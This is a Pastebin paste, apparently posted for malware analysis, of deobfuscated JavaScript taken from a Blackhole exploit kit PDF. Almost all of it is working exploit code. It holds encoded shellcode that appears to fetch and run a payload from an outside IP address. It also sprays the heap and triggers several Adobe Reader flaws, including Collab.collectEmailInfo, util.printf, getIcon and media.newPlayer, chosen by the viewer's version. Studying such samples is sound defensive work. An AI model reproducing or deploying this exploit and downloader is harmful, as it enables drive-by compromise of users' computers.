API tools faq
paste
Advertisement
unixfreaxjp

Blackhole Dropped PDF exploit CVE-2009-0927 deobfuscated

unixfreaxjp
Sep 5th, 2012
184
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.47 KB | None | 0 0
raw download clone embed print report
  1. -------------------eval()---------------------
  2. bjsg = '
  3. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30
  4. %u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374
  5. %u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb
  6. %u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835
  7. %uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  8. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f
  9. %u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24
  10. %ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b
  11. %u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905
  12. %u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  13. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05
  14. %u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08
  15. %ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d
  16. %u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732
  17. %u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  18. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64
  19. %uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51
  20. %u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53
  21. %u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb
  22. %u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  23. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01
  24. %uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a
  25. %u382f%u2e35%u3731%u352e%u2e38%u3231%u2f33%u2e77%u6870
  26. %u3f70%u3d66%u3739%u3164%u2639%u3d65%u0033%u0000';
  27. function ezvr(ra, qy){
  28. while (ra.length * 2 < qy){
  29. ra += ra;
  30. }
  31. ra = ra.substring(0, qy / 2);
  32. return ra;
  33. }
  34. function bx(){
  35. var dkg = new Array();
  36. var vw = 0x0c0c0c0c;
  37. var addr = 0x400000;
  38. var payload = unescape(bjsg);
  39. var sc_len = payload.length * 2;
  40. var qy = addr - (sc_len + 0x38);
  41. var yarsp = unescape("%u9090%u9090");
  42. yarsp = ezvr(yarsp, qy);
  43. var count2 = (vw - 0x400000) / addr;
  44. for (var count = 0; count < count2; count ++ ){
  45. dkg[count] = yarsp + payload;
  46. }
  47. var overflow = unescape("%u0c0c%u0c0c");
  48. while (overflow.length < 44952){
  49. overflow += overflow;
  50. }
  51. this .collabStore = Collab.collectEmailInfo({
  52. subj : "", msg : overflow
  53. }
  54. );
  55. }
  56. function printf(){
  57. nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  58. var payload = unescape(bjsg);
  59. heapblock = nop + payload;
  60. bigblock = unescape("%u0A0A%u0A0A");
  61. headersize = 20;
  62. spray = headersize + heapblock.length;
  63. while (bigblock.length < spray){
  64. bigblock += bigblock;
  65. }
  66. fillblock = bigblock.substring(0, spray);
  67. block = bigblock.substring(0, bigblock.length - spray);
  68. while (block.length + spray < 0x40000){
  69. block = block + block + fillblock;
  70. }
  71. mem = new Array();
  72. for (i = 0; i < 1400; i ++ ){
  73. mem[i] = block + heapblock;
  74. }
  75. var num =
  76. 129999999999999999998888888888888888888888888888888888888888888
  77. 888888888888888888888888888888888888888888888888888888888888888
  78. 888888888888888888888888888888888888888888888888888888888888888
  79. 888888888888888888888888888888888888888888888888888888888888888
  80. 88888888888888888888888888888888888888888888;
  81. util.printf("%45000f", num);
  82. }
  83. function geticon(){
  84. var arry = new Array();
  85. if (app.doc.Collab.getIcon){
  86. var payload = unescape(bjsg);
  87. var hWq500CN = payload.length * 2;
  88. var qy = 0x400000 - (hWq500CN + 0x38);
  89. var yarsp = unescape("%u9090%u9090");
  90. yarsp = ezvr(yarsp, qy);
  91. var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  92. for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  93. arry[vqcQD96y] = yarsp + payload;
  94. }
  95. var tUMhNbGw = unescape("%09");
  96. while (tUMhNbGw.length < 0x4000){
  97. tUMhNbGw += tUMhNbGw;
  98. }
  99. tUMhNbGw = "N." + tUMhNbGw;
  100. app.doc.Collab.getIcon(tUMhNbGw);
  101. }
  102. }
  103. aPlugins = app.plugIns;
  104. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  105. for (var i = 0; i < aPlugins.length; i ++ ){
  106. if (aPlugins[i].name == 'EScript'){
  107. var lv = aPlugins[i].version;
  108. }
  109. }
  110. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  111. geticon();
  112. }
  113. else if (lv == 7.1){
  114. printf();
  115. }
  116. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  117. bx();
  118. }
  119. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  120. function a(){
  121. util.printd('p@111111111111111111111111 : yyyy111', new Date());
  122. }
  123. var h = app.plugIns;
  124. for (var f = 0; f < h.length; f ++ ){
  125. if (h[f].name == 'EScript'){
  126. var i = h[f].version;
  127. }
  128. }
  129. if ((i > 8.12) && (i < 8.2)){
  130. c = new Array();
  131. var d = unescape('%u9090%u9090');
  132. var e = unescape(bjsg);
  133. while (d.length <= 0x8000){
  134. d += d;
  135. }
  136. d = d.substr(0, 0x8000 - e.length);
  137. for (f = 0; f < 2900; f ++ ){
  138. c[f] = d + e;
  139. }
  140. a();
  141. a();
  142. try {
  143. this .media.newPlayer(null);
  144. }
  145. catch (e){
  146. }
  147. a();
  148. }
  149. }
  150. -------------end eval----------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!